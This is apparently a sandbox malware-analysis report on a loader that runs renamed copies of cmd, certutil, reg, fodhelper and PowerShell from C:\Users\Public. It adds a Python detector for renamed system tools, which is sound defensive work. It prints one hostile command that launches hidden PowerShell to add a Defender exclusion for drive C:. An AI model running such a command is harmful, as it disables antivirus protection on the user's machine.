        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF07F4 BCryptDestroyKey,#205,#357,9_2_00007FF607FF07F4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,9_2_00007FF607FDC7F0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608028814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,9_2_00007FF608028814
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F76824 CryptHashCertificate,GetLastError,#357,9_2_00007FF607F76824
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF0844 BCryptExportKey,#205,#359,#357,#357,9_2_00007FF607FF0844
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60805E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,9_2_00007FF60805E8B0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F6A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,9_2_00007FF607F6A8CC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF08EC BCryptGetProperty,#205,#359,#357,#357,9_2_00007FF607FF08EC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608024914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,9_2_00007FF608024914
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,9_2_00007FF607FDE914
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FAF944 CryptDecodeObject,GetLastError,#357,9_2_00007FF607FAF944
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB950 I_CryptGetLruEntryData,#357,9_2_00007FF607FDB950
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608019970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,9_2_00007FF608019970
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,9_2_00007FF607FD597C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F87988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,9_2_00007FF607F87988
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60804B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,9_2_00007FF60804B980
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,9_2_00007FF607F7F9B8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,9_2_00007FF607FDB9CC
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,9_2_00007FF60802BA14
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF1A44
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60800BA50 CryptSignCertificate,SetLastError,9_2_00007FF60800BA50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F83A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F83A40
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608009A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,9_2_00007FF608009A58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FF7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF607FF7A70
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,9_2_00007FF60801FA84
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055AA8 CryptDecodeObjectEx,9_2_00007FF608055AA8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FE9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,9_2_00007FF607FE9AF8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,9_2_00007FF607FB3B14
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60802BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,9_2_00007FF60802BB50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FBBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607FBBB38
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FFFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,9_2_00007FF607FFFB50
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608025B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,9_2_00007FF608025B44
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608027B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,9_2_00007FF608027B60
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,9_2_00007FF607F7BB80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608055B90 CryptDecodeObjectEx,memmove,9_2_00007FF608055B90

        Privilege Escalation

        barindex
        Source: C:\Users\Public\ger.exe Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"

        Compliance

        barindex
        Source: C:\Users\Public\Libraries\Ping_c.pif Unpacked PE file: 31.2.Ping_c.pif.2940000.0.unpack
        Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000F.00000002.1476976535.0000019BC2D60000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000016.00000000.1518864581.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000016.00000002.1531678646.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.15.dr
        Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1445144057.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1446065132.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1447868032.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1458781343.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1459173324.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1464587284.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1469344959.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1465532908.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1473566813.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1469668285.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000000.1473921005.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000002.1478186750.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1506732117.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1478851202.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000002.1499793462.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000000.1498344325.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000002.1518104695.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 
00000014.00000000.1507039984.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000000.1541220928.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000002.1545227076.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.1551820937.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.1548125938.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000000.1552277477.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000002.1552927917.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.1553226732.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.1554180486.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000000.1554505024.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000002.1555442519.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe,
        Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000011.00000000.1479565533.00007FF6BB8EA000.00000002.00000001.01000000.00000007.sdmp, xkn.exe.13.dr
        Source: Binary string: certutil.pdb source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.dr
        Source: Binary string: reg.pdb source: extrac32.exe, 0000000B.00000002.1468605418.0000022844600000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000002.1499281229.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000013.00000000.1498746952.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.11.dr
        Source: Binary string: powershell.pdb source: xkn.exe, 00000011.00000000.1479565533.00007FF6BB8EA000.00000002.00000001.01000000.00000007.sdmp, xkn.exe.13.dr
        Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1445144057.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1446065132.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1447868032.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1458781343.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1459173324.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1464587284.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1469344959.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1465532908.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1473566813.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1469668285.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000000.1473921005.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000E.00000002.1478186750.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1506732117.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1478851202.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000002.1499793462.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000012.00000000.1498344325.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000014.00000002.1518104695.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 
00000014.00000000.1507039984.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000000.1541220928.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001C.00000002.1545227076.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.1551820937.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.1548125938.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000000.1552277477.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000021.00000002.1552927917.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.1553226732.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.1554180486.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000000.1554505024.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000023.00000002.1555442519.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 000
        Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000F.00000002.1476976535.0000019BC2D60000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000016.00000000.1518864581.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000016.00000002.1531678646.00007FF739D2B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.15.dr
        Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000B.00000002.1468605418.0000022844600000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000002.1499281229.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000013.00000000.1498746952.00007FF73A3A0000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.11.dr
        Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.dr
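The PDB strings above are what tie each renamed copy in C:\Users\Public back to the Windows tool it really is: alpha.exe is cmd.exe, kn.exe is certutil.exe, ger.exe is reg.exe, per.exe is fodhelper.exe and xkn.exe is powershell.exe. The trailing UGP/GCTL on some of the report's strings are simply the bytes that follow the path inside the binary, which a raw string scan glues on. The Python below is an added example for this report, not Joe Sandbox or sample code: it reads the NUL-terminated path out of the CodeView RSDS debug record (so the trailing bytes are never picked up) and compares its stem with the file name on disk. The PE stand-ins it scans are constructed byte strings, and the list of system tool names beyond the five in this report is an assumption made for the example.

```python
"""Tie a renamed binary back to its original tool via the CodeView (RSDS) PDB path.

Added example for this report; not Joe Sandbox or sample code. The PE stand-ins
below are constructed byte strings, not the files from the analysis.
"""
import re
import struct
from pathlib import PureWindowsPath

# CodeView 7.0 record: "RSDS", 16-byte GUID, 4-byte age, NUL-terminated ASCII path.
_RSDS = re.compile(rb"RSDS(.{16})(.{4})([\x20-\x7e]{1,260})\x00", re.DOTALL)

# PDB stems of Windows tools worth flagging when found under another file name.
# The first five are the ones this sample renamed; the rest are an assumption
# for the example.
SYSTEM_TOOL_STEMS = {
    "cmd", "certutil", "reg", "fodhelper", "powershell",
    "extrac32", "mshta", "rundll32", "regsvr32", "wscript", "cscript",
}


def extract_pdb_records(data: bytes) -> list[tuple[str, int, str]]:
    """Return (guid_hex, age, pdb_path) for each RSDS record found in *data*."""
    records = []
    for m in _RSDS.finditer(data):
        guid_hex = m.group(1).hex()
        age = struct.unpack("<I", m.group(2))[0]
        records.append((guid_hex, age, m.group(3).decode("ascii")))
    return records


def classify(on_disk_path: str, data: bytes) -> dict:
    """Compare the file name with the PDB stem and say what the binary really is."""
    p = PureWindowsPath(on_disk_path)
    records = extract_pdb_records(data)
    result = {"file": p.name, "pdb": None, "original_tool": None,
              "renamed": False, "verdict": "no CodeView record"}
    if not records:
        return result
    _, _, pdb_path = records[0]
    tool = PureWindowsPath(pdb_path).stem.lower()
    result.update(pdb=pdb_path, original_tool=tool, renamed=tool != p.stem.lower())
    if result["renamed"] and tool in SYSTEM_TOOL_STEMS:
        result["verdict"] = f"renamed system tool: {p.name} is {tool}.exe"
    elif result["renamed"]:
        result["verdict"] = "file name does not match PDB name"
    else:
        result["verdict"] = "file name matches PDB name"
    return result


def _fake_pe(pdb_path: bytes) -> bytes:
    """Constructed stand-in: an MZ header, one RSDS record, then bytes that
    follow it ("GCTL"), which a raw string scan would glue onto the path, as in
    the report's "reg.pdbGCTL". The NUL-terminated parse stops before them."""
    return (b"MZ" + b"\x00" * 62
            + b"RSDS" + bytes(range(16)) + struct.pack("<I", 1) + pdb_path + b"\x00"
            + b"GCTL" + b"\x00" * 8)


# Constructed samples mirroring the file names in the report.
SAMPLES = {
    r"C:\Users\Public\alpha.exe": _fake_pe(b"cmd.pdb"),
    r"C:\Users\Public\kn.exe": _fake_pe(b"certutil.pdb"),
    r"C:\Users\Public\ger.exe": _fake_pe(b"reg.pdb"),
    r"C:\Users\Public\xkn.exe": _fake_pe(b"powershell.pdb"),
    r"C:\Users\Public\per.exe": _fake_pe(b"FodHelper.pdb"),
    r"C:\Windows\System32\certutil.exe": _fake_pe(b"certutil.pdb"),
    r"C:\Users\Public\Libraries\Ping_c.pif": b"MZ" + b"\x00" * 64,  # no debug record
}


def renamed_system_tools(samples: dict[str, bytes]) -> list[dict]:
    """Every sample whose PDB names a known system tool under a different file name."""
    return [r for path, data in samples.items()
            if (r := classify(path, data))["renamed"]
            and r["original_tool"] in SYSTEM_TOOL_STEMS]


if __name__ == "__main__":
    for r in renamed_system_tools(SAMPLES):
        print(f'{r["file"]:<14} {r["pdb"]:<16} {r["verdict"]}')
```

The check is deliberately narrow: a mismatch alone proves little (plenty of legitimate software ships with a PDB named after an internal project), so only a mismatch against a known system-tool stem is reported. On a live host the same comparison can be made against the OriginalFilename version resource, which Sysmon records in its process-creation events.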
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exe Code function: 8_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF744F27B4C
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF608036F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,9_2_00007FF608036F80
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF6080310C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF6080310C4
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF608033100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF608033100
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF60803234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,9_2_00007FF60803234C
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF607FCC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,9_2_00007FF607FCC6F8
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF6080319F8 #359,FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF6080319F8
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF608031B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,9_2_00007FF608031B04
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF607FDDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,9_2_00007FF607FDDBC0
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF607FD5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,9_2_00007FF607FD5E58
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF607FDB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF607FDB3D8
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF607F9D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F9D440
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF607FDD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,9_2_00007FF607FDD4A4
        Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF608013674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,9_2_00007FF608013674
